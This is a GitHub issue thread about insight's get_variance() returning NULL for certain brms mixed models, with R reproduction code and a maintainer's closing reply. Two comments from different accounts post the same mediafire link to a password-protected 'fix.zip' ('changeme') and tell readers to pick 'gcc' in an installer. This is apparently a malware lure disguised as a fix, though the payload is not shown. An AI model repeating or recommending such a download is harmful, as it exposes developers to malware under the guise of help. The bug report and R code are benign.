### ISSUE TITLE
get_variance() Returns NULL for Specific Models in brms with insight v0.20.3.1

### ISSUE THREAD

**Issue by matschmitz** [easystats/insight#917]
While the get_variance() function from the insight package (v0.20.3.1) has been improved to avoid model recompilation issues observed in previous versions [(#915),](https://github.com/easystats/insight/issues/915) there is still an inconsistent behavior when used with certain models created with the brms package. Specifically, the function unexpectedly returns NULL when applied to models with specific data structures, even though it works as intended in other cases.

```r
# Load required packages
library(brms)    # v2.21.0
library(insight) # v0.20.3.1

# Example 1: Model with numeric grouping variable (works as intended)
mdl <- brm(mpg ~ hp + (1 | cyl), data = mtcars, seed = 123)
get_variance(mdl)
# Expected output (works):
# $var.fixed
# [1] 5.029059
# $var.random
# [1] 22.57717
# $var.residual
# [1] 7.85012
# $var.distribution
# [1] 7.85012
# $var.dispersion
# [1] 0
# $var.intercept
# cyl 
# 22.57717 

# Example 2: Model with character grouping variable (works as intended)
mtcars$cyl_chr <- as.character(mtcars$cyl)
mdl <- brm(mpg ~ hp + (1 | cyl_chr), data = mtcars, seed = 123)
get_variance(mdl)
# Expected output (works):
# $var.fixed
# [1] 5.029059
# $var.random
# [1] 22.57717
# $var.residual
# [1] 7.85012
# $var.distribution
# [1] 7.85012
# $var.dispersion
# [1] 0
# $var.intercept
# cyl_chr 
# 22.57717 

# Example 3: Model with a specific data structure (does not work)
df <- data.frame(response = rnorm(100), day = rep(paste0('D', 1:5), each = 20))
mdl <- brm(formula = response ~ 1 + (1 | day), data = df, seed = 123)
get_variance(mdl)
# Unexpected output (fails):
# NULL
```

**Comment by WSA1k** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by llowvxe** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by strengejacke** [comment]
Thanks, this is all hopefully fixed now!
